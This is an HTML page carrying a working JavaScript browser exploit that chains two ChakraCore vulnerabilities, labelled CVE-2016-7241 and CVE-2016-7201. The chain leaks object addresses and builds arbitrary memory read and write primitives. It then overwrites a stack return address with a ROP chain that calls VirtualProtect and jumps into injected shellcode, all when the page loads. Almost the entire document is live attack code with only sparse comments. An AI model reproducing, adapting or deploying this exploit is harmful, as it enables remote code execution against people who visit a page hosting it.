<html>
    <head>
        <script src="long.min.js"></script>
    </head>
<body>
<script>
var Long = dcodeIO.Long;
var dv;
var fdv = new DataView(new ArrayBuffer(8));

var x = (new Array(56, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)).slice();

var [hi, lo] = getAddress(x);

[hi, lo] = [hi|0, (lo + 0x58)|0];   // offset (0x58) to the array data slots

TriggerFillFromPrototypesBug(lo, hi);

var vtable = Read64(new Long(lo - 0x58, hi, true));

var chakraBase = Read64(vtable).sub(0x2F920);

var threadCtxPtr = Read64(chakraBase.add(0x6FCD10)); // ThreadContext * ThreadContext::globalListLast

var stackLimit = Read64(threadCtxPtr.add(0x388));

var stack = stackLimit.sub(0xC000).add(2*1024*1024);   // 2 MB thread stack
var retPtr = chakraBase.add(0x04AEAD);   // Inside ScriptEngine::ExecutePendingScripts (after a call to Execute)

var retPtrAddr;
for (var i = 8; i < 32 * 1024; i += 8)
{
    var val = Read64(stack.sub(i));
    if (val.equals(retPtr))
    {
        retPtrAddr = stack.sub(i);
        break;
    }
}
var retCodeAddr = Read64(retPtrAddr);

var shellLen = 0x1000;

// create shell code
var z = new Uint8Array([
    0xC3, 0x90, 0x90, 0x90, 
    0xC1, 0xE0, 0x18, 0x49,
    0x83, 0xc8, 0x17, 0x31,
    0xFF, 0x4C, 0x89, 0xC0
    ]);

var scU32 = new Uint32Array(z.buffer);

var realShellCode = (new Array(shellLen)).slice();

var shellcAddr = getAddressLong(realShellCode);

var shcodeAddr = Read64(shellcAddr.add(0x28));  // offset (0x28) to the pointer to the buffer
shcodeAddr = shcodeAddr.add(8); // advance to start of buffer

for(var i = 0; i < scU32.length;i+=2)
{
    Write64(shcodeAddr.add(i * 4), new Long(scU32[i], scU32[i+1], true));
}

var filler = new Long(0, 0, true);

var rop = [

    /*

        chakraBase + 0x122BE9           // pop rdi; pop rsi; pop rbx; retn

        shcodeAddr & 0xFF..FFF000       // lpAddress

        0x1000                          // dwSize

        0x40                            // flNewProtect

        chakraBase + 0x122BBF           // setup args => call VirtualProtect

        ...                             // 0x30 garbage (6 * uint64)

        0                               // In order to pass check

        ...                             // 0x98 - 0x38 garbage (12 * uint64)

        shcodeAddr                      // Finally return to our shellcode!

    */

    chakraBase.add(0x122BE9),

    shcodeAddr.and(new Long(0xFFFFF000, 0xFFFFFFFF, true)),

    new Long(shellLen, 0, true),

    new Long(0x40, 0, true),

    chakraBase.add(0x122BBF),

    filler, filler, filler, filler, filler, filler,

    new Long(0, 0, true),

    filler, filler, filler, filler, filler, filler,

    filler, filler, filler, filler, filler, filler,

    shcodeAddr

];

for (var i = 0; i < rop.length; ++i)
{
    Write64(retPtrAddr.add(i * 8), rop[i]);
}

alert("Exploit done!");

/*(CVE-2016-7241)*/
function getAddress(y)
{
    var b = false;
    var a = 1;

    function f(name, value){
         if(!b){ // only do once
            a = new Array(2); // for leaking low, and high address
            this[1] = a; // this == json values
        }
        b = true;
        return y; // object we are leaking address of
    }
    JSON.parse("[1, 2]", f);
    return [a[1], a[0]];    
}
function getAddressLong(y)
{
    var b = false;
    var a = 1;

    function f(name, value){
         if(!b){ // only do once
            a = new Array(2); // for leaking low, and high address
            this[1] = a; // this == json values
        }
        b = true;
        return y; // object we are leaking address of
    }
    JSON.parse("[1, 2]", f);
    return new Long(a[0], a[1], true);
}

/*(CVE-2016-7201)*/
function TriggerFillFromPrototypesBug(lo, hi)
{
    // Type* (which has TypeId)
    x[2] = lo;
    x[3] = hi;

    // +0x3C points to 0 (index 1) for bypassing isDetached check
    x[10] = (lo - 0x38)|0;
    x[11] = hi;

    // buffer length
    x[8] = 0x200;

    // buffer addr
    x[14] = (lo - 0x58)|0;
    x[15] = hi;

    var a = new Array(0x11111111, 0, 0x22222222, 0, 0x33333333, 0, lo, hi, 0x55555555, 0);

    var handler = {
        getPrototypeOf: function(target, name) {
            return a;
        }
    };

    var p = new Proxy([], handler);
    var b = [{}, [], "abc"];

    b.__proto__ = p;
    b.length = 4;

    a.shift.call(b);
    dv = b[2];
}

/* Utility */
function SetAddress(addr)
{
    x[14] = addr.low|0;
    x[15] = addr.high|0;
}

function Read32(addr)
{
    SetAddress(addr);
    return new Long(fdv.getUint32.call(dv, 0, true), 0, true);
}

function Read64(addr)
{
    SetAddress(addr);
    return new Long(fdv.getUint32.call(dv, 0, true), fdv.getUint32.call(dv, 4, true), true);
}

function Write32(addr, val)
{
    SetAddress(addr);
    fdv.setUint32.call(dv, 0, val.low|0, true);
}

function Write64(addr, val)
{
    SetAddress(addr);
    fdv.setUint32.call(dv, 0, val.low|0, true);
    fdv.setUint32.call(dv, 4, val.high|0, true);
}
</script>
</body>
</html>
